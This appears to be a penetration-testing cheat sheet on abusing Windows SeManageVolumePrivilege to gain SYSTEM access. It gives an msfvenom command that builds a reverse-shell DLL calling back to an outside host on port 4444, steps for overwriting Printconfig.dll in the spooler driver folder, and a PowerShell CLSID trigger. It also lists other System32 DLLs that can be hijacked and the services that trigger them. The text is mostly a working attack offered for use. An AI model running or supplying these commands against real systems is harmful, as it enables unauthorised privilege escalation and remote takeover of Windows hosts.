SeManageVolumePrivilege

Using the exploit https://github.com/CsEnox/SeManageVolumeExploit/releases

Run it first

SeManageVolumeExploit.exe

For Printconfig.dll:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll

Then transfer to machine Then copy it:

copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\

Then in powershell:

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Now should have got a shell

For other dlls to overwrite check: Use dllref to check dll to replace to get a reverse shell:

=================================================================================
C:\Windows\System32\wpcoreutil.dll (Windows Insider service `wisvc` triggerd by Clicking Start Windows Insider Program)
=================================================================================
C:\Windows\System32\phoneinfo.dll (Windows Problem Reporting service)
https://twitter.com/404death/status/1262670619067334656  (without reboot by @jonasLyk)
=================================================================================
#dxgi - Trigger is check for protection update
C:\Windows\System32\wbem\dxgi.dll  (windows security -> check for protection update)
=================================================================================
#tzres.dll
C:\Windows\System32\wbem\tzres.dll (systeminfo, NetworkService) 
=================================================================================
### Need to reboot to get NT AUTHORITY\SYSTEM (hijack dll) ###
C:\Windows\System32\wlbsctrl.dll (IKEEXT service)
C:\Windows\System32\wbem\wbemcomn.dll (IP Helper)
=================================================================================
C:\Windows\System32\ualapi.dll (spooler service)
http://www.hexacorn.com/blog/2016/11/08/beyond-good-ol-run-key-part-50/
=================================================================================
C:\Windows\System32\fveapi.dll (ShellHWDetection Service)  @bohops
=================================================================================
C:\Windows\System32\Wow64Log.dll (this dll loaded by other third party services such as GoogleUpdate.exe)
http://waleedassar.blogspot.com/2013/01/wow64logdll.html
=================================================================================
#DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll

#Overwrite:
C:\Windows\System32\spool\drivers\x64\3\

#Trigger
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
=================================================================================
#ALL ABOVE REQUIRE ADMIN READ/WRITE
https://github.com/CsEnox/SeManageVolumeExploit/
SeManageVolumeExploit.exe
=================================================================================                                     

Last updated